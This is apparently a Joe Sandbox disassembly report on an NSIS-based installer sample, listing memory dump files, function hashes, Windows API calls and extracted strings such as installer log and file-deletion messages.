                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                  • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                  • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                  • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                  • GetClientRect.USER32(?,?), ref: 00405196
                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                  • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                  • ShowWindow.USER32(00000008), ref: 00405333
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                  • CreatePopupMenu.USER32 ref: 00405376
                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                  • EmptyClipboard.USER32 ref: 00405411
                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                  • GlobalLock.KERNEL32(00000000), ref: 00405427
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                  • CloseClipboard.USER32 ref: 0040546E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                  • String ID: @rD$New install of "%s" to "%s"${
                                  • API String ID: 2110491804-2409696222
                                  • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                  • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                  • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                  • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                  • DeleteObject.GDI32(?), ref: 00404A79
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $ @$M$N
                                  • API String ID: 1638840714-3479655940
                                  • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                  • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                  • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                  • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                  APIs
                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                  • String ID: 82D$@%F$@rD$A
                                  • API String ID: 3347642858-1086125096
                                  • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                  • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                  • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                  • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                  • API String ID: 1916479912-1189179171
                                  • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                  • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                  • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                  • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                  APIs
                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                  • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                  • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                  • FindClose.KERNEL32(?), ref: 00406E33
                                  Strings
                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                  • \*.*, xrefs: 00406D03
                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                  • API String ID: 2035342205-3294556389
                                  • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                  • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                  • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                  • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                  APIs
                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 3581403547-784952888
                                  • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                  • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                  • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                  • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                  APIs
                                  • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                  Strings
                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                  • API String ID: 542301482-1377821865
                                  • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                  • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                  • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                  • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                  • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                  • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                  • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                  • API String ID: 20674999-2124804629
                                  • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                  • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                  • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                  • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                  • ShowWindow.USER32(?), ref: 004054D2
                                  • DestroyWindow.USER32 ref: 004054E6
                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                  • EnableWindow.USER32(?,?), ref: 0040573C
                                  • EnableWindow.USER32(?,?), ref: 00405757
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
